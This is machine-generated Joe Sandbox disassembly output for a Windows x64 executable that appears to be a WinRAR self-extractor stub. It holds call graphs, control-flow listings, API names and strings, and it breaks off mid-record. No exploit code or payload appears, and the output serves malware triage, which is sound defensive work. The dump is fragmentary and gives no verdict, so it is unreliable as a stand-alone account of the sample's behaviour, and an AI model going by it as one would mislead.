27648->27649 27650 7ff731c92029 27649->27650 27652 7ff731c84740 27651->27652 27654 7ff731c8474a 27651->27654 27653 7ff731ca2150 33 API calls 27652->27653 27653->27654 27654->27624 27656 7ff731c81776 memcpy_s 27655->27656 27689 7ff731c88a08 27656->27689 27658 7ff731c8180e 27658->27629 27659 7ff731c817aa 27661 7ff731c88a08 144 API calls 27659->27661 27662 7ff731c817e8 27659->27662 27699 7ff731c88c0c 27659->27699 27661->27659 27662->27658 27663 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27662->27663 27666 7ff731c8183a 27663->27666 27664 7ff731c8187a 27665 7ff731c818c5 27664->27665 27667 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27664->27667 27665->27629 27666->27664 27666->27665 27668 7ff731c71fa0 31 API calls 27666->27668 27669 7ff731c818f3 27667->27669 27668->27666 27671 7ff731c9180e 27670->27671 27673 7ff731c91821 27671->27673 27705 7ff731c8e8c4 27671->27705 27677 7ff731c919b7 27673->27677 27712 7ff731c8a944 31 API calls _invalid_parameter_noinfo_noreturn 27673->27712 27674 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27675 7ff731c91a50 27674->27675 27677->27674 27678->27609 27679->27633 27681 7ff731c740dd 27680->27681 27682 7ff731c740d7 memcpy_s 27680->27682 27681->27682 27713 7ff731c74120 33 API calls 2 library calls 27681->27713 27682->27615 27684->27616 27685->27629 27686->27631 27687->27633 27688->27609 27692 7ff731c88a51 BuildCatchObjectHelperInternal 27689->27692 27693 7ff731c88b8d 27689->27693 27690 7ff731c88bda 27691 7ff731c8e784 SetThreadExecutionState RtlPcToFileHeader RaiseException 27690->27691 27696 7ff731c88bdf 27691->27696 27692->27693 27695 7ff731c960ac 135 API calls 27692->27695 27692->27696 27697 7ff731c84848 106 API calls 27692->27697 27698 7ff731c82890 102 API calls 27692->27698 27693->27690 27694 7ff731c7a174 8 API calls 27693->27694 27694->27690 27695->27692 27696->27659 27697->27692 27698->27692 27700 7ff731c88c4b 27699->27700 27701 7ff731c88c32 BuildCatchObjectHelperInternal 27699->27701 27700->27701 27702 7ff731c82ca0 102 API calls 27700->27702 27703 7ff731c88c79 27701->27703 27704 7ff731c84848 106 API calls 27701->27704 27702->27701 27704->27703 27706 7ff731c8ec58 101 API calls 27705->27706 27707 7ff731c8e8db ReleaseSemaphore 27706->27707 27708 7ff731c8e91f DeleteCriticalSection CloseHandle CloseHandle 27707->27708 27709 7ff731c8e900 27707->27709 27710 7ff731c8e9d8 99 API calls 27709->27710 27711 7ff731c8e90a CloseHandle 27710->27711 27711->27708 27711->27709 27712->27677 27715 7ff731c88842 27714->27715 27716 7ff731c88852 27714->27716 27721 7ff731c823b0 27715->27721 27716->27332 27719 7ff731ca22a0 _handle_error 8 API calls 27718->27719 27720 7ff731c7f7ec 27719->27720 27720->27231 27720->27530 27722 7ff731c823cf 27721->27722 27725 7ff731c82a60 99 API calls 27722->27725 27723 7ff731c823e8 27726 7ff731c82b70 99 API calls 27723->27726 27724 7ff731c823f8 27724->27716 27725->27723 27726->27724 27728 7ff731c75e6f 27727->27728 27791 7ff731c885b0 27728->27791 27730 7ff731c76134 27801 7ff731c76fcc 80 API calls 27730->27801 27732 7ff731c769af 27733 7ff731ca22a0 _handle_error 8 API calls 27732->27733 27736 7ff731c769c3 27733->27736 27734 7ff731c769e4 27737 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27734->27737 27735 7ff731c76973 27813 7ff731c7466c 80 API calls 27735->27813 27736->27343 27739 7ff731c769e9 27737->27739 27742 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27739->27742 27740 7ff731c7612e 27740->27730 27740->27735 27741 7ff731c885b0 102 API calls 27740->27741 27743 7ff731c761a4 27741->27743 27744 7ff731c769ef 27742->27744 27743->27730 27747 7ff731c761ac 27743->27747 27745 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27744->27745 27746 7ff731c769f5 27745->27746 27748 7ff731c7623f 27747->27748 27802 7ff731c7466c 80 API calls 27747->27802 27748->27735 27750 7ff731c76266 27748->27750 27753 7ff731c762ce 27750->27753 27754 7ff731c768b7 27750->27754 27755 7ff731c76481 27753->27755 27758 7ff731c762e0 27753->27758 27756 7ff731c84cc4 31 API calls 27754->27756 27806 7ff731c84c34 33 API calls 27755->27806 27762 7ff731c768c6 27756->27762 27759 7ff731c74228 33 API calls 27758->27759 27772 7ff731c7638f 27758->27772 27785 7ff731c7613c 27758->27785 27760 7ff731c76360 27759->27760 27761 7ff731c73c84 47 API calls 27760->27761 27763 7ff731c76375 27761->27763 27762->27785 27812 7ff731c74840 128 API calls 3 library calls 27762->27812 27803 7ff731c7701c 80 API calls 27763->27803 27766 7ff731c74228 33 API calls 27766->27772 27769 7ff731c73c84 47 API calls 27769->27772 27771 7ff731c76402 27771->27785 27805 7ff731c8c7bc 8 API calls _handle_error 27771->27805 27772->27766 27772->27769 27772->27771 27773 7ff731c71fa0 31 API calls 27772->27773 27804 7ff731c7701c 80 API calls 27772->27804 27773->27772 27775 7ff731c7649e 27807 7ff731c73d00 33 API calls memcpy_s 27775->27807 27777 7ff731c766f9 27778 7ff731c90cd4 33 API calls 27777->27778 27779 7ff731c7672e 27778->27779 27780 7ff731c76745 27779->27780 27808 7ff731c74840 128 API calls 3 library calls 27779->27808 27781 7ff731c7674b 27780->27781 27786 7ff731c7675b 27780->27786 27809 7ff731c7473c 50 API calls 27781->27809 27785->27732 27785->27734 27785->27744 27788 7ff731c76756 27786->27788 27810 7ff731c88558 33 API calls BuildCatchObjectHelperInternal 27786->27810 27788->27739 27788->27785 27811 7ff731c7433c 80 API calls 2 library calls 27788->27811 27789->27343 27792 7ff731c885d4 27791->27792 27794 7ff731c8865a 27791->27794 27793 7ff731c8863c 27792->27793 27795 7ff731c740b0 33 API calls 27792->27795 27793->27740 27794->27793 27796 7ff731c740b0 33 API calls 27794->27796 27797 7ff731c8860d 27795->27797 27798 7ff731c88673 27796->27798 27814 7ff731c7a174 27797->27814 27800 7ff731c82890 102 API calls 27798->27800 27800->27793 27801->27785 27805->27785 27806->27775 27807->27777 27808->27780 27809->27788 27810->27788 27811->27785 27812->27785 27815 7ff731c7a185 27814->27815 27816 7ff731c7a19a 27815->27816 27818 7ff731c8aed4 8 API calls 2 library calls 27815->27818 27816->27793 27818->27816 27824 7ff731c79be7 27819->27824 27820 7ff731c79c1b 27821 7ff731ca22a0 _handle_error 8 API calls 27820->27821 27822 7ff731c79c9d 27821->27822 27822->27360 27824->27820 27827 7ff731c79cae 27824->27827 27831 7ff731c79c83 27824->27831 27955 7ff731c85254 27824->27955 27973 7ff731c8dadc 27824->27973 27826 7ff731c71fa0 31 API calls 27826->27820 27828 7ff731c79cbf 27827->27828 27977 7ff731c8d9c4 CompareStringW 27827->27977 27830 7ff731c720b0 33 API calls 27828->27830 27828->27831 27830->27831 27831->27826 27841 7ff731c85efa 27832->27841 27833 7ff731c8615b 27834 7ff731ca22a0 _handle_error 8 API calls 27833->27834 27835 7ff731c7fb39 27834->27835 27835->27363 27905 7ff731c87c54 47 API calls 2 library calls 27835->27905 27837 7ff731c7129c 33 API calls 27839 7ff731c860e9 27837->27839 27838 7ff731c86194 27840 7ff731c71fa0 31 API calls 27839->27840 27842 7ff731c860fb BuildCatchObjectHelperInternal 27839->27842 27840->27842 27841->27833 27841->27837 27845 7ff731c8618e 27841->27845 27842->27833 27843 7ff731c86189 27842->27843 27844 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27843->27844 27844->27845 27981 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 27845->27981 27847 7ff731c7e6d9 27846->27847 27848 7ff731c7e717 27847->27848 27982 7ff731c7bc88 80 API calls 27847->27982 27848->27395 27848->27402 27848->27440 27850 7ff731c7e70a 27983 7ff731c728a4 80 API calls 2 library calls 27850->27983 27904->27350 27905->27365 27906->27363 27907->27381 27908->27394 27909->27386 27911->27434 27919->27415 27920->27413 27953->27354 27954->27354 27957 7ff731c85294 27955->27957 27956 7ff731ca22a0 _handle_error 8 API calls 27958 7ff731c854c3 27956->27958 27960 7ff731c852d2 __vcrt_FlsAlloc 27957->27960 27969 7ff731c852f9 __vcrt_FlsAlloc 27957->27969 27978 7ff731c91374 CompareStringW 27957->27978 27958->27824 27962 7ff731c85342 __vcrt_FlsAlloc 27960->27962 27960->27969 27979 7ff731c91374 CompareStringW 27960->27979 27963 7ff731c7129c 33 API calls 27962->27963 27964 7ff731c853f9 27962->27964 27962->27969 27965 7ff731c853e6 27963->27965 27967 7ff731c854db 27964->27967 27968 7ff731c85449 27964->27968 27966 7ff731c8728c 8 API calls 27965->27966 27966->27964 27971 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 27967->27971 27968->27969 27980 7ff731c91374 CompareStringW 27968->27980 27969->27956 27972 7ff731c854e0 27971->27972 27974 7ff731c8daef 27973->27974 27975 7ff731c720b0 33 API calls 27974->27975 27976 7ff731c8db0d 27974->27976 27975->27976 27976->27824 27977->27828 27978->27960 27979->27962 27980->27969 27981->27838 27982->27850 27983->27848 28040 7ff731c71fa0 31 API calls 28039->28040 28041 7ff731c730a5 28040->28041 28042 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 28041->28042 28043 7ff731c730fd 28042->28043 28044 7ff731c8b7e1 28043->28044 28045 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 28043->28045 28044->27519 28046 7ff731c8b802 28045->28046 28048 7ff731c8876f 28047->28048 28054 7ff731c845dc 28048->28054 28050 7ff731c88805 28051 7ff731c845dc 106 API calls 28050->28051 28052 7ff731c88811 28051->28052 28053->27513 28055 7ff731c845f2 28054->28055 28057 7ff731c845fa 28054->28057 28056 7ff731c8e8c4 106 API calls 28055->28056 28056->28057 28057->28050 28058->26887 28059->26893 28060->26896 26219 7ff731cabeac 26226 7ff731cabbb4 26219->26226 26231 7ff731cad3c0 35 API calls 2 library calls 26226->26231 26228 7ff731cabbbf 26232 7ff731cacfe8 35 API calls abort 26228->26232 26231->26228 28078 7ff731cad8cc 28079 7ff731cad917 28078->28079 28083 7ff731cad8db abort 28078->28083 28085 7ff731cad61c 15 API calls abort 28079->28085 28081 7ff731cad8fe HeapAlloc 28082 7ff731cad915 28081->28082 28081->28083 28083->28079 28083->28081 28084 7ff731cabb40 abort 2 API calls 28083->28084 28084->28083 28085->28082 25290 7ff731ca2070 25291 7ff731ca2086 _com_error::_com_error 25290->25291 25296 7ff731ca3ff8 25291->25296 25293 7ff731ca2097 25301 7ff731ca1880 25293->25301 25297 7ff731ca4034 RtlPcToFileHeader 25296->25297 25298 7ff731ca4017 25296->25298 25299 7ff731ca404c 25297->25299 25300 7ff731ca405b RaiseException 25297->25300 25298->25297 25299->25300 25300->25293 25327 7ff731ca14d8 25301->25327 25304 7ff731ca190b 25305 7ff731ca17e8 DloadReleaseSectionWriteAccess 6 API calls 25304->25305 25306 7ff731ca1918 RaiseException 25305->25306 25307 7ff731ca1b35 25306->25307 25308 7ff731ca19bd LoadLibraryExA 25310 7ff731ca19d4 GetLastError 25308->25310 25311 7ff731ca1a29 25308->25311 25309 7ff731ca1b05 25335 7ff731ca17e8 25309->25335 25312 7ff731ca19e9 25310->25312 25313 7ff731ca19fe 25310->25313 25314 7ff731ca1a34 FreeLibrary 25311->25314 25317 7ff731ca1a3d 25311->25317 25312->25311 25312->25313 25319 7ff731ca17e8 DloadReleaseSectionWriteAccess 6 API calls 25313->25319 25314->25317 25315 7ff731ca1934 25315->25308 25315->25309 25315->25311 25315->25317 25316 7ff731ca1a9b GetProcAddress 25316->25309 25320 7ff731ca1ab0 GetLastError 25316->25320 25317->25309 25317->25316 25321 7ff731ca1a0b RaiseException 25319->25321 25322 7ff731ca1ac5 25320->25322 25321->25307 25322->25309 25323 7ff731ca17e8 DloadReleaseSectionWriteAccess 6 API calls 25322->25323 25324 7ff731ca1ae7 RaiseException 25323->25324 25325 7ff731ca14d8 _com_raise_error 6 API calls 25324->25325 25326 7ff731ca1b01 25325->25326 25326->25309 25328 7ff731ca14ee 25327->25328 25334 7ff731ca1553 25327->25334 25343 7ff731ca1584 25328->25343 25331 7ff731ca154e 25333 7ff731ca1584 DloadReleaseSectionWriteAccess 3 API calls 25331->25333 25333->25334 25334->25304 25334->25315 25336 7ff731ca1851 25335->25336 25337 7ff731ca17f8 25335->25337 25336->25307 25338 7ff731ca1584 DloadReleaseSectionWriteAccess 3 API calls 25337->25338 25339 7ff731ca17fd 25338->25339 25340 7ff731ca184c 25339->25340 25341 7ff731ca1758 DloadProtectSection 3 API calls 25339->25341 25342 7ff731ca1584 DloadReleaseSectionWriteAccess 3 API calls 25340->25342 25341->25340 25342->25336 25344 7ff731ca159f 25343->25344 25345 7ff731ca14f3 25343->25345 25344->25345 25346 7ff731ca15a4 GetModuleHandleW 25344->25346 25345->25331 25350 7ff731ca1758 25345->25350 25347 7ff731ca15b9 25346->25347 25348 7ff731ca15be GetProcAddress 25346->25348 25347->25345 25348->25347 25349 7ff731ca15d3 GetProcAddress 25348->25349 25349->25347 25352 7ff731ca177a DloadProtectSection 25350->25352 25351 7ff731ca1782 25351->25331 25352->25351 25353 7ff731ca17ba VirtualProtect 25352->25353 25355 7ff731ca1624 VirtualQuery GetSystemInfo 25352->25355 25353->25351 25355->25353 26233 7ff731ca0360 26234 7ff731ca039f 26233->26234 26235 7ff731ca0417 26233->26235 26237 7ff731c8aaa0 46 API calls 26234->26237 26236 7ff731c8aaa0 46 API calls 26235->26236 26238 7ff731ca042b 26236->26238 26239 7ff731ca03b3 26237->26239 26240 7ff731c8da14 48 API calls 26238->26240 26241 7ff731c8da14 48 API calls 26239->26241 26242 7ff731ca03c2 BuildCatchObjectHelperInternal 26240->26242 26241->26242 26243 7ff731c71fa0 31 API calls 26242->26243 26245 7ff731ca0546 26242->26245 26247 7ff731ca054c 26242->26247 26244 7ff731ca04c1 26243->26244 26258 7ff731c7250c 26244->26258 26248 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26245->26248 26249 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26247->26249 26248->26247 26251 7ff731ca0552 26249->26251 26259 7ff731c72516 SetDlgItemTextW 26258->26259 26260 7ff731c72513 26258->26260 26260->26259 28061 7ff731ca114f 28062 7ff731ca1082 28061->28062 28063 7ff731ca1880 _com_raise_error 14 API calls 28062->28063 28063->28062
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                                    • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                    • API String ID: 3376987105-2702805183
                                                                    • Opcode ID: f040698b65793e6d7f2921c5c019537af51ab54fa7a6e6cccf934c4893d0de37
                                                                    • Instruction ID: 1790b234002cc56f8929b4aa93f8a287ad86b64590e2b5879836b25abfe31d19
                                                                    • Opcode Fuzzy Hash: f040698b65793e6d7f2921c5c019537af51ab54fa7a6e6cccf934c4893d0de37
                                                                    • Instruction Fuzzy Hash: 65D2C462E0878265EB20FB65E8542F9E361FF86780FE04131D94D47AA5EFBCE544E720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                                    • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                    • API String ID: 3007431893-3916287355
                                                                    • Opcode ID: 818e76b5e157183c2655d10f8c5f0c039429fb36bdff72257209617f7d488c54
                                                                    • Instruction ID: bff35514618658291f44c0ccce2ad40a86be23f71c3f437f43f16fc297e3a99c
                                                                    • Opcode Fuzzy Hash: 818e76b5e157183c2655d10f8c5f0c039429fb36bdff72257209617f7d488c54
                                                                    • Instruction Fuzzy Hash: A113C272F04B82A8EB10EF64D8802FC67A1FB50798FA01535DA4D17AD9EFB8D594D360

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1466 7ff731ca06d4-7ff731ca07a9 call 7ff731c8df4c call 7ff731c8629c call 7ff731c993ec call 7ff731ca3c70 call 7ff731c99994 1477 7ff731ca07e0-7ff731ca0803 1466->1477 1478 7ff731ca07ab-7ff731ca07c0 1466->1478 1479 7ff731ca0805-7ff731ca081a 1477->1479 1480 7ff731ca083a-7ff731ca085d 1477->1480 1481 7ff731ca07c2-7ff731ca07d5 1478->1481 1482 7ff731ca07db call 7ff731ca218c 1478->1482 1483 7ff731ca0835 call 7ff731ca218c 1479->1483 1484 7ff731ca081c-7ff731ca082f 1479->1484 1485 7ff731ca085f-7ff731ca0874 1480->1485 1486 7ff731ca0894-7ff731ca08b7 1480->1486 1481->1482 1487 7ff731ca0d5d-7ff731ca0d62 call 7ff731ca7884 1481->1487 1482->1477 1483->1480 1484->1483 1484->1487 1490 7ff731ca088f call 7ff731ca218c 1485->1490 1491 7ff731ca0876-7ff731ca0889 1485->1491 1492 7ff731ca08b9-7ff731ca08ce 1486->1492 1493 7ff731ca08ee-7ff731ca08fa GetCommandLineW 1486->1493 1501 7ff731ca0d63-7ff731ca0daf call 7ff731ca7884 call 7ff731ca1880 1487->1501 1490->1486 1491->1487 1491->1490 1498 7ff731ca08d0-7ff731ca08e3 1492->1498 1499 7ff731ca08e9 call 7ff731ca218c 1492->1499 1495 7ff731ca0900-7ff731ca0937 call 7ff731ca78fc call 7ff731c7129c call 7ff731c9ca50 1493->1495 1496 7ff731ca0ac7-7ff731ca0ade call 7ff731c86414 1493->1496 1526 7ff731ca0939-7ff731ca094c 1495->1526 1527 7ff731ca096c-7ff731ca0973 1495->1527 1510 7ff731ca0ae0-7ff731ca0b05 call 7ff731c71fa0 call 7ff731ca35c0 1496->1510 1511 7ff731ca0b09-7ff731ca0c64 call 7ff731c71fa0 SetEnvironmentVariableW GetLocalTime call 7ff731c83de8 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff731c9af94 call 7ff731c8986c call 7ff731c96734 * 2 DialogBoxParamW call 7ff731c96828 * 2 1496->1511 1498->1487 1498->1499 1499->1493 1521 7ff731ca0db4-7ff731ca0dea 1501->1521 1510->1511 1572 7ff731ca0c66 Sleep 1511->1572 1573 7ff731ca0c6c-7ff731ca0c73 1511->1573 1525 7ff731ca0dec 1521->1525 1525->1525 1530 7ff731ca0967 call 7ff731ca218c 1526->1530 1531 7ff731ca094e-7ff731ca0961 1526->1531 1532 7ff731ca0979-7ff731ca0993 OpenFileMappingW 1527->1532 1533 7ff731ca0a5b-7ff731ca0a92 call 7ff731ca78fc call 7ff731c7129c call 7ff731c9fc8c 1527->1533 1530->1527 1531->1501 1531->1530 1537 7ff731ca0a50-7ff731ca0a59 CloseHandle 1532->1537 1538 7ff731ca0999-7ff731ca09b9 MapViewOfFile 1532->1538 1533->1496 1554 7ff731ca0a94-7ff731ca0aa7 1533->1554 1537->1496 1538->1537 1541 7ff731ca09bf-7ff731ca09ef UnmapViewOfFile MapViewOfFile 1538->1541 1541->1537 1544 7ff731ca09f1-7ff731ca0a4a call 7ff731c9a110 call 7ff731c9fc8c call 7ff731c8b970 call 7ff731c8babc call 7ff731c8bb2c UnmapViewOfFile 1541->1544 1544->1537 1557 7ff731ca0ac2 call 7ff731ca218c 1554->1557 1558 7ff731ca0aa9-7ff731ca0abc 1554->1558 1557->1496 1558->1557 1561 7ff731ca0d57-7ff731ca0d5c call 7ff731ca7884 1558->1561 1561->1487 1572->1573 1574 7ff731ca0c75 call 7ff731c99ecc 1573->1574 1575 7ff731ca0c7a-7ff731ca0c9d call 7ff731c8b89c DeleteObject 1573->1575 1574->1575 1580 7ff731ca0c9f DeleteObject 1575->1580 1581 7ff731ca0ca5-7ff731ca0cac 1575->1581 1580->1581 1582 7ff731ca0cc8-7ff731ca0cd9 1581->1582 1583 7ff731ca0cae-7ff731ca0cb5 1581->1583 1585 7ff731ca0cdb-7ff731ca0ce7 call 7ff731c9fda4 CloseHandle 1582->1585 1586 7ff731ca0ced-7ff731ca0cfa 1582->1586 1583->1582 1584 7ff731ca0cb7-7ff731ca0cc3 call 7ff731c7ba1c 1583->1584 1584->1582 1585->1586 1587 7ff731ca0d1f-7ff731ca0d24 call 7ff731c99464 1586->1587 1588 7ff731ca0cfc-7ff731ca0d09 1586->1588 1597 7ff731ca0d29-7ff731ca0d56 call 7ff731ca22a0 1587->1597 1591 7ff731ca0d19-7ff731ca0d1b 1588->1591 1592 7ff731ca0d0b-7ff731ca0d13 1588->1592 1591->1587 1596 7ff731ca0d1d 1591->1596 1592->1587 1595 7ff731ca0d15-7ff731ca0d17 1592->1595 1595->1587 1596->1587
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                    • API String ID: 1048086575-3710569615
                                                                    • Opcode ID: 0228d48b430fbbc5536735ec76bcf2bafee8ef021e5fbde81c8a6567330422ab
                                                                    • Instruction ID: cc2525f7fc963430ab21d7a7546527c3bd1ca853f9e638aeb54358bfa545de40
                                                                    • Opcode Fuzzy Hash: 0228d48b430fbbc5536735ec76bcf2bafee8ef021e5fbde81c8a6567330422ab
                                                                    • Instruction Fuzzy Hash: 7312CB22E08782A5EB11FB24E8452BDE361FF84784FE05631DA9D47A95DFBCE150E360

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                    • String ID: $%s:$CAPTION
                                                                    • API String ID: 2100155373-404845831
                                                                    • Opcode ID: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                                                    • Instruction ID: 5708f34cf4f43424ce303b7596ee1ad5ed3f5cceba71cd7526abf37b14920a93
                                                                    • Opcode Fuzzy Hash: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                                                    • Instruction Fuzzy Hash: 7291F632F186519AE718EF29E84066AE7A1FBC4B84FA05535EE4D47B58CF7CE805CB10

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                    • String ID: PNG
                                                                    • API String ID: 211097158-364855578
                                                                    • Opcode ID: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                                                    • Instruction ID: e69c3383b4524b7c4d3b6540fa333413e7b4c571369ca2eb949460d4f9838028
                                                                    • Opcode Fuzzy Hash: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                                                    • Instruction Fuzzy Hash: 9C414F25E19B46A1EF14EB56E444379E3A0BF88BD4FA44435DE0D873A4EFBCE4589320
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
